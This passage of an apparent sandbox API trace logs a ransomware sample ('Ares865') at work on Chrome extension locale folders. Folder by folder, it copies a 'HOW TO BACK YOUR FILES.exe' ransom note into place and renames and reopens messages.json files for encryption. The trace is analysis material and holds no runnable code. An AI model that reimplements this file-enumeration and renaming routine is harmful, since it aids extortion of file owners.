TO BACK YOUR FILES.exe") returned -1 [0103.665] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.665] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.Ares865") returned 163 [0103.665] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.667] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=209) returned 1 [0103.672] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN" [0103.672] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN" [0103.672] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.672] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.673] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.673] GetLastError () returned 0x0 [0103.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0c23a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f0c23a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.674] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.674] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.674] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.Ares865") returned 163 [0103.674] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.676] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=215) returned 1 [0103.686] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi" [0103.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi" [0103.686] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.686] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.687] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.687] GetLastError () returned 0x0 [0103.688] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.688] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0c23a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f0c23a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.688] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.688] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.688] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.Ares865") returned 160 [0103.688] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.692] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0103.696] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk" [0103.696] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk" [0103.696] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.696] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.697] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.697] GetLastError () returned 0x0 [0103.697] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.697] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0c23a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f0c23a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.697] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.697] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.697] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.Ares865") returned 160 [0103.698] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.699] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=270) returned 1 [0103.703] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr" [0103.703] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr" [0103.703] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.703] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.704] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.704] GetLastError () returned 0x0 [0103.704] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.704] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0e8500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f0e8500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.704] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.704] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.704] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.Ares865") returned 160 [0103.704] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.706] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.706] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0103.709] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" [0103.709] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" [0103.709] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.709] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.710] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.710] GetLastError () returned 0x0 [0103.710] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.710] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0e8500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f0e8500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.711] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.711] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.711] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.Ares865") returned 160 [0103.711] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), 